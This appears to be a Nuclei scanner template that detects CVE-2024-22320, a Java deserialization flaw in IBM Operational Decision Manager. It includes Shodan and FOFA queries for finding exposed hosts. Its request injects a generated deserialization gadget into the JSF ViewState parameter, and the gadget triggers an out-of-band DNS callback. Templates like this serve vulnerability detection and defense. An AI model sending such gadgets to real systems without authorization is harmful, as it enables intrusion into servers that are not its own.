id: CVE-2024-22320 info: name: IBM Operational Decision Manager - Java Deserialization author: DhiyaneshDK severity: high description: | IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146. reference: - https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/ - https://nvd.nist.gov/vuln/detail/CVE-2024-22320 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2024-22320 cwe-id: CWE-502 epss-score: 0.38316 epss-percentile: 0.97125 cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ibm product: operational_decision_manager shodan-query: - html:"IBM ODM" - http.html:"ibm odm" fofa-query: - title="IBM ODM" - title="ibm odm" - body="ibm odm" tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce http: - method: GET path: - '{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}' matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - 'javax.servlet.ServletException' - type: status status: - 500 # digest: 4b0a00483046022100bb5445a0a7a75731a60c4f541edc93846d4b21a800881005eb87588c9efe49a5022100c19eb39aff09e8bb429bb5c62816d7c8c8f6aff8bf92d80e455c4e9d0591e021:922c64590222798bb761d5b6d8e72950